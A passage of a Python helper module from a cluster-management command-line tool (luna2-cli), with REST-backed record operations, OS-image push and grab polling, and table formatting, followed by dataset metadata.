comment,\n prescript, postscript, partscript, content etc. but\n not limited to them only.\n \"\"\"\n response = ''\n editor = str(os.path.abspath(__file__)).replace('helper.py', 'editor.sh')\n os.chmod(editor, 0o0755)\n random_path = str(time())+str(randint(1001,9999))+str(getpid())\n tmp_folder = f'/tmp/lunatmp-{random_path}'\n os.mkdir(tmp_folder)\n if key == 'content':\n filename = f'/tmp/lunatmp-{random_path}/{payload[\"name\"]}{key}'\n else:\n filename = f'/tmp/lunatmp-{random_path}/{key}'\n temp_file = open(filename, \"x\", encoding='utf-8')\n if value:\n value = self.base64_decode(value)\n temp_file.write(value)\n temp_file.close()\n subprocess.check_output(f\"sed -i 's/\\r$//' {editor}\", shell=True)\n subprocess.call([editor, filename])\n with open(filename, 'rb') as file_data:\n response = self.base64_encode(file_data.read())\n os.remove(filename)\n os.rmdir(tmp_folder)\n return response\n\n\n def get_list(self, table=None, args=None):\n \"\"\"\n Method to list all switches from Luna Configuration.\n \"\"\"\n response = False\n fields, rows = [], []\n get_list = Rest().get_data(table)\n if get_list.status_code == 200:\n get_list = get_list.content\n else:\n Message().error_exit(get_list.content, get_list.status_code)\n self.logger.debug(f'Get List Data from Helper => {get_list}')\n if get_list:\n data = get_list['config'][table]\n if args['raw']:\n json_data = Helper().prepare_json(data)\n # print(json_data)\n response = Presenter().show_json(json_data)\n else:\n data = Helper().prepare_json(data, True)\n fields, rows = self.filter_data(table, data)\n # fields = list(map(lambda x: x.replace('tpm_uuid', 'tpm_present'), fields))\n # fields = list(map(lambda x: x.replace('ns_ip', 'nameserver'), fields))\n self.logger.debug(f'Fields => {fields}')\n self.logger.debug(f'Rows => {rows}')\n title = f' << {table.capitalize()} >>'\n response = Presenter().show_table(title, fields, rows)\n else:\n response = Message().show_error(f'{table} is not found.')\n return response\n\n\n def show_data(self, table=None, args=None):\n \"\"\"\n Method to show a switch in Luna Configuration.\n \"\"\"\n row_name = None\n if 'name' in args:\n row_name = args['name']\n get_list = Rest().get_data(table, row_name)\n if get_list.status_code == 200:\n get_list = get_list.content\n else:\n Message().error_exit(get_list.content, get_list.status_code)\n self.logger.debug(f'Get List Data from Helper => {get_list}')\n if get_list:\n if row_name:\n data = get_list['config'][table][row_name]\n else:\n data = get_list['config'][table]\n json_data = Helper().prepare_json(data)\n if args['raw']:\n response = Presenter().show_json(json_data)\n else:\n data = Helper().prepare_json(data, True)\n fields, rows = self.filter_data_col(table, data)\n self.logger.debug(f'Fields => {fields}')\n self.logger.debug(f'Rows => {rows}')\n title = f'{table.capitalize()} => {data[\"name\"]}'\n response = Presenter().show_table_col(title, fields, rows)\n else:\n response = Message().show_error(f'{args[\"name\"]} is not found in {table}.')\n return response\n\n\n def member_record(self, table=None, args=None):\n \"\"\"\n This method fetch the nodes to the provided entity.\n \"\"\"\n response = False\n get_list = Rest().get_data(table, args['name']+'/_member')\n if get_list.status_code == 200:\n get_list = get_list.content\n else:\n Message().error_exit(get_list.content, get_list.status_code)\n self.logger.debug(f'Get List Data from Helper => {get_list}')\n if get_list:\n data = get_list['config'][table][args[\"name\"]]['members']\n data = Helper().prepare_json(data)\n if args['raw']:\n response = Presenter().show_json(data)\n else:\n num = 1\n fields = ['#', 'Nodes']\n rows = []\n for member in data:\n new_row = [num, member]\n rows.append(new_row)\n num = num + 1\n title = f'<< {table.capitalize()} {args[\"name\"]} Member Nodes >>'\n response = Presenter().show_table(title, fields, rows)\n else:\n response = Message().show_error(f'{table} {args[\"name\"]} not have any node.')\n return response\n\n\n def reserved_ip(self, args=None):\n \"\"\"\n This method will fetch all the reserved IP Address for a network.\n \"\"\"\n response = False\n get_list = Rest().get_data('network', args['name']+'/_member')\n if get_list.status_code == 200:\n get_list = get_list.content\n else:\n Message().error_exit(get_list.content, get_list.status_code)\n self.logger.debug(f'Get List Data from Helper => {get_list}')\n if get_list:\n data = get_list['config']['network'][args[\"name\"]]['taken']\n data = Helper().prepare_json(data)\n if args['raw']:\n response = Presenter().show_json(data)\n else:\n num = 1\n fields = ['#', 'IP Address', 'Device Name']\n rows = []\n for each in data:\n new_row = [num, each['ipaddress'], each['device']]\n rows.append(new_row)\n num = num + 1\n title = f'<< Reserved IP Addresses for Network {args[\"name\"]} >>'\n response = Presenter().show_table(title, fields, rows)\n else:\n response = Message().show_error(f'Network {args[\"name\"]} not have any IP reserved.')\n return response\n\n\n def add_record(self, table=None, data=None):\n \"\"\"\n This method will add a new record.\n \"\"\"\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n payload = self.prepare_payload(None, data)\n request_data = {'config':{table:{payload['name']: payload}}}\n self.logger.debug(f'Payload => {request_data}')\n record = Rest().get_data(table, payload['name'])\n if record.status_code == 200:\n message = f'{payload[\"name\"]} already present in {table.capitalize()}'\n Message().error_exit(message, record.status_code)\n else:\n response = Rest().post_data(table, payload['name'], request_data)\n self.logger.debug(f'Response => {response}')\n if response.status_code == 201:\n Message().show_success(response.content)\n else:\n Message().error_exit(response.content, response.status_code)\n return True\n\n\n def update_record(self, table=None, data=None):\n \"\"\"\n This method will update a record.\n \"\"\"\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n if 'raw' in data:\n data.pop('raw', None)\n payload = self.prepare_payload(table, data)\n name = None\n if 'name' in payload:\n name = payload['name']\n request_data = {'config':{table:{name: payload}}}\n else:\n request_data = {'config':{table: payload}}\n if 'cluster' in table:\n request_data = {'config':{table: payload}}\n self.logger.debug(f'Payload => {request_data}')\n if 'cluster' in table:\n response = Rest().post_data(table, None, request_data)\n else:\n record = Rest().get_data(table, payload['name'])\n if record.status_code == 200:\n if len(payload) == 1:\n Message().error_exit('Kindly choose something to update.')\n else:\n response = Rest().post_data(table, name, request_data)\n else:\n Message().error_exit(f'Kindly add the {payload[\"name\"]} first', record.status_code)\n self.logger.debug(f'Response => {response}')\n if response.status_code == 204:\n if name:\n Message().show_success(f'{table.capitalize()} {name} is updated.')\n else:\n Message().show_success(f'{table.capitalize()} is updated.')\n else:\n Message().error_exit(response.content, response.status_code)\n return True\n\n\n def delete_record(self, table=None, data=None):\n \"\"\"\n This method will delete a record.\n \"\"\"\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n self.logger.debug(f'Payload => {data}')\n response = Rest().get_delete(table, data['name'])\n self.logger.debug(f'Response => {response}')\n if response.status_code == 204:\n Message().show_success(f'{table.capitalize()} {data[\"name\"]} is removed.')\n else:\n Message().error_exit(response.content, response.status_code)\n return True\n\n\n def rename_record(self, table=None, data=None, newname=None):\n \"\"\"\n This method will rename a record.\n \"\"\"\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n request_data = {'config':{table:{data['name']: data}}}\n self.logger.debug(f'Payload => {request_data}')\n response = Rest().post_data(table, data['name'], request_data)\n self.logger.debug(f'Response => {response}')\n if response.status_code == 204:\n Message().show_success(f'{table.capitalize()} {data[\"name\"]} is renamed to {newname}.')\n else:\n Message().error_exit(response.content, response.status_code)\n return True\n\n\n def clone_record(self, table=None, data=None):\n \"\"\"\n This method will clone a record.\n \"\"\"\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n payload = self.prepare_payload(table, data)\n request_data = {'config':{table:{payload['name']: payload}}}\n self.logger.debug(f'Payload => {request_data}')\n response = Rest().post_clone(table, payload['name'], request_data)\n self.logger.debug(f'Response => {response}')\n if response.status_code == 201:\n Message().show_success(response.content)\n else:\n Message().error_exit(response.content, response.status_code)\n return True\n\n\n def grab_osimage(self, table=None, data=None):\n \"\"\"\n Method to grab an osimage for a node.\n \"\"\"\n process1 = Process(target=Helper().loader, args=(\"OS Image Grabbing...\",))\n process1.start()\n response = False\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n uri = f'config/{table}/{data[\"name\"]}/_osgrab'\n data = self.prepare_payload(table, data)\n request_data = {'config':{table:{data['name']: data}}}\n self.logger.debug(f'Payload => {data}')\n http_response = Rest().post_raw(uri, request_data)\n result = http_response\n if http_response.status_code == 200:\n http_response = http_response.json()\n if 'request_id' in http_response.keys():\n uri = f'config/status/{http_response[\"request_id\"]}'\n def dig_grabbing_status(uri):\n result = Rest().get_raw(uri)\n if result.status_code == 404:\n process1.terminate()\n return True\n elif result.status_code == 200:\n http_response = result.json()\n if http_response['message']:\n message = http_response['message'].split(';;')\n for msg in message:\n sleep(2)\n Message().show_success(f'{msg}')\n sleep(2)\n return dig_grabbing_status(uri)\n else:\n return False\n response = dig_grabbing_status(uri)\n if response:\n Message().show_success(f'[========] OS Image Grabbed for node {data[\"name\"]}.')\n else:\n Message().error_exit(result.content, result.status_code)\n return True\n\n\n def push_osimage(self, table=None, data=None):\n \"\"\"\n Method to push an osimage for a node or a group.\n \"\"\"\n process1 = Process(target=Helper().loader, args=(\"OS Image Pushing...\",))\n process1.start()\n response = False\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n uri = f'config/{table}/{data[\"name\"]}/_ospush'\n data = self.prepare_payload(table, data)\n request_data = {'config':{table:{data['name']: data}}}\n self.logger.debug(f'Payload => {data}')\n http_response = Rest().post_raw(uri, request_data)\n result = http_response\n if http_response.status_code == 200:\n http_response = http_response.json()\n if 'request_id' in http_response.keys():\n uri = f'config/status/{http_response[\"request_id\"]}'\n def dig_push_status(uri):\n result = Rest().get_raw(uri)\n if result.status_code == 404:\n process1.terminate()\n return True\n elif result.status_code == 200:\n http_response = result.json()\n if http_response['message']:\n message = http_response['message'].split(';;')\n for msg in message:\n sleep(2)\n Message().show_success(f'{msg}')\n sleep(2)\n return dig_push_status(uri)\n else:\n return False\n response = dig_push_status(uri)\n if response:\n Message().show_success(f'[========] OS Image Pushed for {table} {data[\"name\"]}.')\n else:\n Message().error_exit(result.content, result.status_code)\n return True\n\n\n def get_hostlist(self, raw_hosts=None):\n \"\"\"\n This method will perform power option on node.\n \"\"\"\n response = []\n self.logger.debug(f'Received hostlist: {raw_hosts}.')\n try:\n response = hostlist.expand_hostlist(raw_hosts)\n self.logger.debug(f'Expanded hostlist: {response}.')\n except hostlist.BadHostlist:\n self.logger.debug(f'Hostlist is incorrect: {raw_hosts}.')\n return response\n\n\n def common_list_args(self, parser=None):\n \"\"\"\n This method will provide the common list and show arguments..\n \"\"\"\n parser.add_argument('-v', '--verbose', action='store_true', help='Verbose Mode')\n parser.add_argument('-R', '--raw', action='store_true', help='Raw JSON output')\n return parser\n\n\n def loader(self, message=None):\n \"\"\"\n This method is a loader, will run while transactions happens.\n \"\"\"\n animation = [\n f\"[= ] {message}\",\n f\"[=== ] {message}\",\n f\"[==== ] {message}\",\n f\"[===== ] {message}\",\n f\"[====== ] {message}\",\n f\"[======= ] {message}\",\n f\"[========] {message}\",\n f\"[ =======] {message}\",\n f\"[ ======] {message}\",\n f\"[ =====] {message}\",\n f\"[ ====] {message}\",\n f\"[ ===] {message}\",\n f\"[ ==] {message}\",\n f\"[ =] {message}\",\n f\"[ ] {message}\",\n f\"[ ] {message}\", ]\n not_complete = True\n i = 0\n try:\n while not_complete:\n print(animation[i % len(animation)], end='\\r')\n sleep(.1)\n i += 1\n except KeyboardInterrupt:\n return False\n return True\n\n\n def control_print(self, system=None, content=None, count=None):\n \"\"\"\n This method will parse the data for Control API's.\n \"\"\"\n result = {}\n possible_cases = ['ok', 'on', 'off']\n if 'failed' in content['control']:\n for key, value in content['control']['failed'].items():\n result[key] = value\n\n if system in content['control']:\n for case in possible_cases:\n if case in content['control'][system]:\n for key, value in content['control'][system][case].items():\n result[key] = case.upper()\n result = dict(sorted(result.items()))\n\n header = \"| # | Node Name | \"\n header += \"Status |\"\n hr_line = 'X--------------------------------------------'\n hr_line += '--------------------------------------------X'\n rows = []\n for key, value in result.items():\n rows.append([count, key, value])\n count = count + 1\n\n if rows:\n for row in rows:\n if row[0] == 1:\n Message().show_success(hr_line)\n Message().show_success(header)\n Message().show_success(hr_line)\n row[0] = f'{row[0]}'.ljust(6)\n row[1] = f'{row[1]}'.ljust(19)\n row[2] = f'{row[2]}'.ljust(58)\n line = f'| {row[0]}| {row[1]}| {row[2]}|'\n Message().show_success(line)\n return count\n\n\n def dig_control_status(self, request_id=None, count=None, system=None):\n \"\"\"\n This method will fetch the status of Control API.\n \"\"\"\n uri = f'control/status/{request_id}'\n sleep(2)\n status = Rest().get_raw(uri)\n status_json = status.json()\n if status.status_code == 200:\n count = Helper().control_print(system, status_json, count)\n return self.dig_control_status(request_id, count, system)\n elif status.status_code == 404:\n hr_line = 'X--------------------------------------------'\n hr_line += '--------------------------------------------X'\n Message().show_success(hr_line)\n else:\n Message().show_error(f\"Something Went Wrong {status.status_code}\")\n\n\n def filter_interface(self, table=None, data=None):\n \"\"\"\n This method will generate the data as for\n row format from the interface\n \"\"\"\n self.logger.debug(f'table => {table}')\n self.logger.debug(f'data => {data}')\n fields, rows, colored_fields = [], [], []\n fields = filter_columns(table)\n self.logger.debug(f'fields => {fields}')\n for field_key in fields:\n val_row = []\n for ele in data:\n if field_key in list(ele.keys()):\n if ele[field_key] == 'in progress':\n val_row.append(colored('in progress', 'green'))\n elif ele[field_key] == 'queued':\n val_row.append(colored('queued', 'yellow'))\n elif ele[field_key] == 1:\n val_row.append(colored('yes', 'green'))\n elif ele[field_key] == 0:\n val_row.append(colored('no', 'yellow'))\n elif ele[field_key] == 'maintask':\n val_row.append(colored('Main Task', 'blue'))\n elif ele[field_key] == 'subtask':\n val_row.append(colored('Sub Task', 'magenta'))\n else:\n val_row.append(ele[field_key])\n else:\n val_row.append(\"--NA--\")\n self.logger.debug(f'Element => {ele}')\n rows.append(val_row)\n val_row = []\n colored_fields.append(field_key)\n fields = colored_fields\n self.logger.debug(f'Rows before Swapping => {rows}')\n final_rows = []\n for array in range(len(rows[0])) :\n tmp = []\n for element in rows:\n tmp.append(element[array])\n final_rows.append(tmp)\n rows = final_rows\n # Adding Serial Numbers to the dataset\n fields.insert(0, '#')\n num = 1\n for outer in rows:\n outer.insert(0, num)\n num = num + 1\n # Adding Serial Numbers to the dataset\n return fields, rows\n\n\n def filter_data(self, table=None, data=None):\n \"\"\"\n This method will generate the data as for\n row format\n \"\"\"\n self.logger.debug(f'Table => {table}')\n self.logger.debug(f'Data => {data}')\n fields, rows, colored_fields = [], [], []\n fields = filter_columns(table)\n self.logger.debug(f'Fields => {fields}')\n for field_key in fields:\n val_row = []\n for ele in data:\n if field_key in list((data[ele].keys())):\n if isinstance(data[ele][field_key], list):\n new_list = []\n for internal in data[ele][field_key]:\n for internal_val in internal:\n self.logger.debug(f'Key => {internal_val}')\n self.logger.debug(f'Value => {internal[internal_val]}')\n in_key = internal_val\n in_val = internal[internal_val]\n new_list.append(f'{in_key} = {in_val} ')\n new_list = '\\n'.join(new_list)\n val_row.append(new_list)\n new_list = []\n elif field_key == 'tpm_uuid':\n if data[ele][field_key]:\n val_row.append(True)\n else:\n val_row.append(False)\n else:\n val_row.append(data[ele][field_key])\n else:\n val_row.append(\"--NA--\")\n rows.append(val_row)\n self.logger.debug(f'Each Row => {val_row}')\n val_row = []\n colored_fields.append(field_key)\n fields = colored_fields\n final_rows = []\n for array in range(len(rows[0])) :\n tmp = []\n for element in rows:\n tmp.append(element[array])\n final_rows.append(tmp)\n rows = final_rows\n # Adding Serial Numbers to the dataset\n fields.insert(0, '#')\n num = 1\n for outer in rows:\n outer.insert(0, num)\n num = num + 1\n # Adding Serial Numbers to the dataset\n return fields, rows\n\n\n def base64_encode(self, content=None):\n \"\"\"\n This method will encode a base 64 string.\n \"\"\"\n try:\n if content is not None:\n content = base64.b64encode(content).decode(\"utf-8\")\n except binascii.Error:\n self.logger.debug(f'Base64 Encode Error => {content}')\n return content\n\n\n def base64_decode(self, content=None):\n \"\"\"\n This method will decode the base 64 string.\n \"\"\"\n try:\n if content is not None:\n content = content.replace(\"\\r\", \"\\\\r\")\n content = base64.b64decode(content, validate=True).decode(\"utf-8\")\n except binascii.Error:\n self.logger.debug(f'Base64 Decode Error => {content}')\n except UnicodeDecodeError:\n self.logger.debug(f'Base64 Unicode Decode Error => {content}')\n return content\n\n\n def update_dict(self, data=None):\n \"\"\"\n Deep Update the Dict\n \"\"\"\n for key, value in data.items():\n if isinstance(value, str):\n value = None if value == 'None' else value\n if value is not None:\n data[key] = self.base64_decode(value)\n return self.update_dict(data)\n else:\n return self.update_dict(data)\n return data\n\n\n def callback(self, value=None):\n \"\"\"\n This method is a call back method for the nested lookup.\n \"\"\"\n if isinstance(value, str):\n if value.lower() == 'none':\n value = None\n elif value.lower() == 'true':\n value = True\n elif value.lower() == 'false':\n value = False\n elif value.lower() == 'null':\n value = None\n response = value\n if value not in [None, True, False] and isinstance(value, str):\n response = self.base64_decode(value)\n return response\n\n\n def nested_dict(self, dictionary=None, limit=False):\n \"\"\"\n This method will check the nested dictionary.\n \"\"\"\n for key, value in dictionary.items():\n if isinstance(value, str):\n if key in EDITOR_KEYS:\n doc = nested_alter({key : value}, key, self.callback)\n dictionary[key] = self.less_content(doc[key], limit)\n else:\n dictionary[key] = value\n elif isinstance(value, dict):\n return self.nested_dict(dictionary, limit)\n elif isinstance(value, list):\n return self.nested_list(dictionary, key, value, limit)\n return dictionary\n\n\n def nested_list(self, dictionary=None, key=None, value=None, limit=False):\n \"\"\"\n This method will check the list for a dictionary.\n \"\"\"\n response = []\n if value:\n for occurrence in value:\n if isinstance(occurrence, str):\n if key in EDITOR_KEYS:\n doc = nested_alter({key : occurrence}, key, self.callback)\n response.append(self.less_content(doc[key], limit))\n else:\n response.append(occurrence)\n elif isinstance(occurrence, dict):\n response.append(self.nested_dict(occurrence, limit))\n dictionary[key] = response\n return dictionary\n\n\n def less_content(self, content=None, limit=False):\n \"\"\"\n This method will reduce the length of the content.\n \"\"\"\n if limit:\n if content not in [None, True, False] and isinstance(content, str):\n if len(content) > 60:\n content = content[:60]+' ...'\n return content\n\n\n def prepare_json(self, json_data=None, limit=False):\n \"\"\"\n This method will decode the base 64 string.\n \"\"\"\n self.logger.debug(f'Data Limit => {limit}')\n if isinstance(json_data, dict):\n for key, value in json_data.items():\n if isinstance(value, str):\n if key in EDITOR_KEYS:\n doc = nested_alter({key : value}, key, self.callback)\n json_data[key] = self.less_content(doc[key], limit)\n else:\n json_data[key] = value\n elif isinstance(value, dict):\n json_data[key] = self.nested_dict(value, limit)\n elif isinstance(value, list):\n final_list = []\n if value:\n for occurrence in value:\n if isinstance(occurrence, str):\n doc = nested_alter({key : occurrence}, key, self.callback)\n final_list.append(self.less_content(doc[key], limit))\n elif isinstance(occurrence, dict):\n final_list.append(self.nested_dict(occurrence, limit))\n json_data[key] = final_list\n return json_data\n\n\n def get_secrets(self, table=None, data=None):\n \"\"\"\n This method will filter data for Secrets\n \"\"\"\n self.logger.debug(f'Table => {table} and Data => {data}')\n rows, colored_fields = [], []\n fields = filter_columns(table)\n self.logger.debug(f'Fields => {fields}')\n for key in data:\n new_row = []\n for value in data[key]:\n self.logger.debug(f'Key => {key} and Value => {value}')\n new_row.append(key)\n new_row.append(value['name'])\n new_row.append(value['path'])\n content = self.base64_decode(value['content'])\n if content is not None:\n new_row.append(content[:60]+'...')\n else:\n new_row.append(content)\n rows.append(new_row)\n new_row = []\n for newfield in fields:\n colored_fields.append(newfield)\n fields = colored_fields\n # Adding Serial Numbers to the dataset\n fields.insert(0, '#')\n num = 1\n for outer in rows:\n outer.insert(0, num)\n num = num + 1\n # Adding Serial Numbers to the dataset\n return fields, rows\n\n\n def filter_secret_col(self, table=None, data=None):\n \"\"\"\n This method will generate the data as for\n row format\n \"\"\"\n self.logger.debug(f'Table => {table} and Data => {data}')\n rows, colored_fields = [], []\n fields = sortby(table)\n self.logger.debug(f'Fields => {fields}')\n for key in data:\n new_row = []\n for value in data[key]:\n self.logger.debug(f'Key => {key} and Value => {value}')\n new_row.append(key)\n new_row.append(value['name'])\n new_row.append(value['path'])\n content = self.base64_decode(value['content'])\n if content is not None:\n new_row.append(content[:60]+'...')\n else:\n new_row.append(content)\n # new_row.append(content)\n rows.append(new_row)\n new_row = []\n for newfield in fields:\n colored_fields.append(newfield)\n fields = colored_fields\n # Adding Serial Numbers to the dataset\n fields.insert(0, '#')\n num = 1\n for outer in rows:\n outer.insert(0, num)\n num = num + 1\n # Adding Serial Numbers to the dataset\n new_fields, new_row = [], []\n for row in rows:\n new_fields = new_fields + fields\n new_row = new_row + row\n new_fields.append(\"\")\n new_row.append(\"\")\n return new_fields, new_row\n\n\n def filter_data_col(self, table=None, data=None):\n \"\"\"\n This method will generate the data as for row format\n \"\"\"\n self.logger.debug(f'Table => {table} and Data => {data}')\n defined_keys = sortby(table)\n self.logger.debug(f'Fields => {defined_keys}')\n data = self.merge_source(table, data)\n for new_key in list(data.keys()):\n if new_key not in defined_keys:\n defined_keys.append(new_key)\n index_map = {v: i for i, v in enumerate(defined_keys)}\n data = sorted(data.items(), key=lambda pair: index_map[pair[0]])\n self.logger.debug(f'Sorted Data => {data}')\n fields, rows = [], []\n for key in data:\n fields.append(key[0])\n if isinstance(key[1], list):\n new_list = []\n for internal in key[1]:\n for internal_val in internal:\n self.logger.debug(f'Key: {internal_val} Value: {internal[internal_val]}')\n if internal_val == \"interface\":\n new_list.append(f'{internal_val} = {internal[internal_val]}')\n else:\n new_list.append(f' {internal_val} = {internal[internal_val]}')\n new_list = '\\n'.join(new_list)\n rows.append(new_list)\n new_list = []\n elif isinstance(key[1], dict):\n new_list = []\n num = 1\n for internal in key[1]:\n self.logger.debug(f'Key => {internal} and Value => {key[1][internal]}')\n in_key = internal\n in_val = key[1][internal]\n new_list.append(f'{in_key} = {in_val} ')\n num = num + 1\n new_list = '\\n'.join(new_list)\n rows.append(new_list)\n new_list = []\n else:\n rows.append(key[1])\n return fields, rows\n\n\n def merge_source(self, table=None, data=None):\n \"\"\"\n This method will merge *_source field to the real field with braces and remove the\n *_source keys from the output.\n \"\"\"\n response = deepcopy(data)\n for key, value in data.items():\n script = True if 'part' in key or 'post' in key or 'pre' in key else False\n if '_source' in key:\n raw_name = key.replace('_source', '')\n if isinstance(data[raw_name], str):\n default_value = data[raw_name].rstrip()\n if len(default_value) == 0:\n default_value = ''\n else:\n default_value = data[raw_name]\n if value in data:\n if script is True and default_value != '':\n response[raw_name] = f'({data[value]}) {default_value}'\n else:\n response[raw_name] = f'{default_value} ({data[value]})'\n else:\n if str(value) == str(table):\n response[raw_name] = f'{default_value}'\n else:\n if script is True and default_value != '':\n response[raw_name] = f'({value}) {default_value}'\n else:\n response[raw_name] = f'{default_value} ({value})'\n del response[key]\n return response\n\n\n def filter_osimage_col(self, table=None, data=None):\n \"\"\"\n This method will generate the data as for row format\n \"\"\"\n self.logger.debug(f'Table => {table} and Data => {data}')\n defined_keys = sortby(table)\n self.logger.debug(f'Fields => {defined_keys}')\n for new_key in list(data.keys()):\n if new_key not in defined_keys:\n defined_keys.append(new_key)\n index_map = {v: i for i, v in enumerate(defined_keys)}\n data = sorted(data.items(), key=lambda pair: index_map[pair[0]])\n self.logger.debug(f'Sorted Data => {data}')\n osimage = [\"OS Image\\n\"]\n fields, rows = [\"Tags\\n\"], [\"Details\\n\"]\n for key in data:\n fields.append(key[0])\n osimage.append(key[1]['osimage'])\n if isinstance(key[1], list):\n new_list = []\n for internal in key[1]:\n for internal_val in internal:\n self.logger.debug(f'Key: {internal_val} Value: {internal[internal_val]}')\n if internal_val == \"interface\":\n new_list.append(f'{internal_val} = {internal[internal_val]}')\n else:\n new_list.append(f' {internal_val} = {internal[internal_val]}')\n new_list = '\\n'.join(new_list)\n rows.append(new_list)\n new_list = []\n elif isinstance(key[1], dict):\n new_list = []\n num = 1\n for internal in key[1]:\n self.logger.debug(f'Key => {internal} and Value => {key[1][internal]}')\n if internal != \"name\":\n in_key = internal\n in_val = key[1][internal]\n if len(key[1]) == num:\n new_list.append(f'{in_key} = {in_val} \\n')\n else:\n new_list.append(f'{in_key} = {in_val} ')\n num = num + 1\n new_list = '\\n'.join(new_list)\n rows.append(new_list)\n new_list = []\n else:\n rows.append(key[1])\n return fields, osimage, rows\n", "repo_name": "clustervision/luna2-cli", "sub_path": "luna/utils/helper.py", "file_name": "helper.py", "file_ext": "py", "file_size_in_byte": 40945, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "luna.utils.log.Log.get_logger", "line_number": 37, "usage_type": "call"}, {"api_name": "luna.utils.log.Log", "line_number": 37, "usage_type": "name"}, {"api_name": "luna.utils.constant.BOOL_KEYS", "line_number": 45, "usage_type": "name"}, {"api_name": "nested_lookup.nested_lookup", "line_number": 46, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 50, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 52, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 54, "usage_type": "call"}, {"api_name": "luna.utils.constant.EDITOR_KEYS", "line_number": 64, "usage_type": "name"}, {"api_name": "nested_lookup.nested_lookup", "line_number": 65, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 69, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 73, "usage_type": "call"}, {"api_name": "nested_lookup.nested_lookup", "line_number": 75, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 78, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 81, "usage_type": "call"}, {"api_name": "nested_lookup.nested_delete", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "nested_lookup.nested_update", "line_number": 89, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 91, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.chmod", "line_number": 107, "usage_type": "call"}, {"api_name": "time.time", "line_number": 108, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 108, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 108, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 110, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 120, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 121, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 124, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 125, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 135, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 139, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 146, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 155, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 157, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 168, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 172, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 181, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 188, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 190, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 199, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 203, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 209, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 219, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 221, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 230, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 234, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 240, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 250, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 252, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 265, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 268, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 270, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 273, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 275, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 298, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 300, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 303, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 305, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 307, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 311, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 313, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 315, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 326, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 329, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 331, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 343, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 346, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 348, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 361, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 364, "usage_type": "call"}, 